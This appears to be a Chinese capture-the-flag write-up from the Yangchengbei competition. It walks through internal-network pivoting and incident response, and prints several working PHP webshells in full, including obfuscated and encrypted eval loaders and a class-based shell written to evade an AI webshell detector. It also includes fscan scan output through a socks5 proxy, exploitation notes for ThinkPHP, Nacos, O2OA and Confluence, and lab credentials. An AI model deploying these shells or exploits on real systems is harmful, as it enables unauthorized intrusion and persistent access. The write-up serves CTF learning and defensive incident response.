runtime/log/202409/1726051660-11.log: 'peiqi' => '@eval(@base64_decode($_POST[\'s678798e5a716d\']));',
runtime/log/202409/11.log:[ 2024-09-11T18:52:48+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.441600s][吞吐率:2.26req/s] [内存消耗:1,312.26kb] [文件加载:27]
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/Util/PHP/eval-stdin.php [运行时间:0.589981s][吞吐率:1.69req/s] [内存消耗:1,312.27kb] [文件加载:27]
runtime/log/202409/11.log: 'PHP' => 'eval-stdin.php',
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.610092s][吞吐率:1.64req/s] [内存消耗:1,312.66kb] [文件加载:27]
runtime/log/202409/11.log: 'PHP' => 'eval-stdin.php',
runtime/log/202409/11.log:[ 2024-09-11T18:52:49+08:00 ] 192.168.54.130 10.50.143.12 GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
runtime/log/202409/11.log:[ log ] 10.1.143.10:35007/lib/phpunit/phpunit/Util/PHP/eval-stdin.php [运行时间:0.620653s][吞吐率:1.61req/s] [内存消耗:1,312.27kb] [文件加载:27]
public/bak.php:<?php $a="~+d()"^"!{+{}";@$b=base64_decode(${$a}["a"]);eval("".$b);?>
public/._/.shell7128_54314.php:<?php @eval($_POST[54314]);?>
public/s.php:<?php @error_reporting(0);session_start();$key="dfff0a7fa1a55c8c";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$HiC7g=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/\s+/','','base 64 _ deco de');$HiC7g=$t($HiC7g."");for($i=0;$i<strlen($HiC7g);$i++) { $new_key = $key[$i+1&15];$HiC7g[$i] = $HiC7g[$i] ^ $new_key;} }else{ $HiC7g=openssl_decrypt($HiC7g, "AES128", $key);}$arr=explode('|',$HiC7g);$func=$arr[0];$params=$arr[1];class G5vi70ip{ public function __invoke($p) {@eval("/*Za801f73rl*/".$p."");}}@call_user_func/*Za801f73rl*/(new G5vi70ip(),$params);?>
public/scss/bootstrap/scss/_functions.scss:// Utility mixins and functions for evaluating source code across our variables, maps, and mixins.
public/scss/bootstrap/scss/_functions.scss:// Used to evaluate Sass maps like our grid breakpoints.
thinkphp/library/think/view/driver/Php.php: eval('?>' . $__content__);
thinkphp/library/think/view/driver/Php.php: eval('?>' . $content);
thinkphp/library/think/Response.php: $this->header['Cache-Control'] = 'max-age=' . $cache[1] . ',must-revalidate';
thinkphp/library/think/response/Redirect.php: $this->cacheControl('no-cache,must-revalidate');
Binary file thinkphp/tests/extensions/5.4/apcu.so matches
Binary file thinkphp/tests/extensions/7.0/redis.so matches
Binary file thinkphp/tests/extensions/5.6/apcu.so matches
Binary file thinkphp/tests/extensions/5.5/apcu.so matches
/var/www/html/ >
/var/www/html/ >grep -r "eval" /AI位置
挂一个全局socks5代理出来,全局做扫描内网其他段
C:\Users\86189\Desktop\羊城杯_wp>fscan_mian.exe -socks5 10.50.143.7:6001 -h 192.168.95.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
Socks5Proxy: socks5://10.50.143.7:6001
start infoscan
192.168.95.80:80 open
192.168.95.1:80 open
192.168.95.41:80 open
192.168.95.1:22 open
192.168.95.110:8090 open
192.168.95.110:8091 open
192.168.95.100:8848 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle http://192.168.95.80 code:200 len:46512 title:AI.Tech - YangCheng Artificial Intelligence
[*] WebTitle http://192.168.95.41 code:200 len:8504 title:WebShell检测产品 - 羊城数智
[*] WebTitle http://192.168.95.110:8091 code:204 len:0 title:None
[*] WebTitle http://192.168.95.100:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle http://192.168.95.1 code:200 len:30753 title:羊城数智科技有限公司 | Yangcheng Technology
[+] PocScan http://192.168.95.100:8848 poc-yaml-alibaba-nacos
[*] WebTitle http://192.168.95.110:8090 code:200 len:54428 title:羊城数智科技有限公司 - 羊城数智科技有限公司 - Confluence
[+] InfoScan http://192.168.95.110:8090 [ATLASSIAN-Confluence]
[+] PocScan http://192.168.95.80 poc-yaml-thinkphp5023-method-rce poc1企业官网
confluence主机
用户名:admin
密码:Yangcheng@admin!@#
192.168.30.121:80 open
192.168.30.1:80 open
192.168.30.33:8080 open
192.168.30.1:22 open
192.168.30.130:80 open
192.168.30.100:8848 open
192.168.30.33:8443 open
[*] WebTitle: http://192.168.30.130 code:200 len:282 title:None
[*] WebTitle: http://192.168.30.100:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.33:8080 code:404 len:713 title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.121 code:500 len:7077 title:系统发生错误
[*] WebTitle: https://192.168.30.33:8443 code:404 len:713 title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.30.1 code:500 len:7077 title:系统发生错误
[+] http://192.168.30.100:8848 poc-yaml-alibaba-nacosflag3
源码审计。发现后台插件可以上传zip,我们只需修改一下原来的插件代码即可
修改源码,上传插件getshell
AI shell
给的一个ycb内部AI沙箱检测平台。手工写了个class类绕过。
<?php
class a{
public $command_;
public function b($command){
eval($command);
}
}
$cc = new a();
$cc->b($_GET['cmd']);
?>
OA
考的O2OA远程命令执行(CVE-2022-22916),这里可执行命令。需要反弹
网址:192.168.30.130
用户名:xadmin
密码:o2@YC#2024
备注:OA 系统中的特殊流程说明、常用功能快捷入口等。flag4
confluence写个内存马进去,获取flag4
flag12
代理出隧道后。全局去打内部nacos主机
反弹shell,这里尝试了比较久。内部有限制
应急响应
应急响应1-ip
获取官网主机权限,对内部进行应急
找到的恶意攻击IP
应急响应2-webshell
.shell7128_54314.php
public/._/.shell7128_54314.php:<?php @eval($_POST[54314]);?>
应急响应3-ip:port
内网主机恶意流量
192.168.18.29:19005
转载
分享
1 条评论
可输入 255 字
发布投稿
